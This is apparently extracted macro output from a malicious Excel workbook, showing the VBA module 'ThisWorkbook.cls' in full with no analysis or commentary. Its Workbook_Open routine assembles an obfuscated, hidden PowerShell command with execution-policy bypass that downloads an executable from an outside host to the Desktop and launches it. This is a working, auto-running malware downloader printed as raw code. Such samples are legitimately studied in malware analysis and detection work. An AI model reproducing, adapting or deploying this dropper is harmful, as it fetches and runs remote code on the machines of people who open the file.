Filename     : ./macros/f709b658f57ae5d561c419a4ef6d71b809e97bfd8876cac26d9b2e40233907ff
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function sandermantiger()
If xlInterpolated > 0 Then

cooperbmws = Array(Now(), "ErShe")
ligusoptimus = Array(Now(), "opRoFi -W", Now())


kekleclanes = Array(Now(), "NOnInt", Now(), Now())
portobravisimo = Array(Second(Now), Now(), Minute(Now), Now(), Now(), "eCUTI", Minute(Now), Now(), Now())
porcheroomes = "as"
rememberdayandtime = Array(Second(Now), Now(), Now(), Now(), "de" + "N -N")
virtualkeybbs = Array(porcheroomes + "s    """, Minute(Now), Minute(Now), "d  " + " /c""")
sandermantiger = "cm" + virtualkeybbs(3) + "pOW" + cooperbmws(1) + "Ll -n" + ligusoptimus(1) + "In  hiD" + rememberdayandtime(4) + "OLo -" + kekleclanes(1) + "eRA  -eX" + portobravisimo(5) + "oNp bYp" + virtualkeybbs(0)
End If
End Function




Sub Workbook_Open()
If contverresUnverified > 0.9 Then
Dim bleemsignals As String
Randomize
bleemsignals = Int(Rnd * 9999999#)
engsiniores = olelekoceelo + "0mk6::gETfoLDERpATh(\""Desktop\"");(&(\""{0}{1}{2}\"" -f'Ne','w-','Object') "
rabbeiego = bleemsignals
baltimoruss = "(\""{0}{2}{1}{3}{5}{6}{4}\""-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLoaDFilE.iNVoKE(\""http://nometana.com/trms\"",\""$Des\" + rabbeiego + ".exe\"")}"
familiesnames = tosterbreads + rabbeiego + ".exe"""
rubicvonv = techblueand + engsiniores + baltimoruss + familiesnames
Shell sandermantiger + rubicvonv, fmTabStyleTabs
End If
End Sub







Function tosterbreads()
tosterbreads = "while(!${?});&(\""{0}{2}{3}{1}\""-f 'St','ocess','art','-Pr') $Des\"
End Function


Function olelekoceelo()
olelekoceelo = "do{&(\""{1}{0}\"" -f'ep','sle') 33;${D`es} =  $7d"
End Function

Function techblueand()
techblueand = "$7d0" + "mK6 = [Ty" + "PE](\""{1}{0" + "}{3}{2}\"" -f 'on','EN" + "VIr','Nt','mE') ;  "
End Function




